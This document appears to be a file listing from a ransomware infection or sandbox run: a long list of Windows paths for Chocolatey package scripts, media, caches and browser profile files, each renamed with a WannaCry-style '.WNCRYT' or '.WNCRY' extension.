C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
C:\Users\user\AppData\Local\IconCache.db.WNCRYT
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRYT
C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRYT
C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRYT
C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRYT
C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRYT
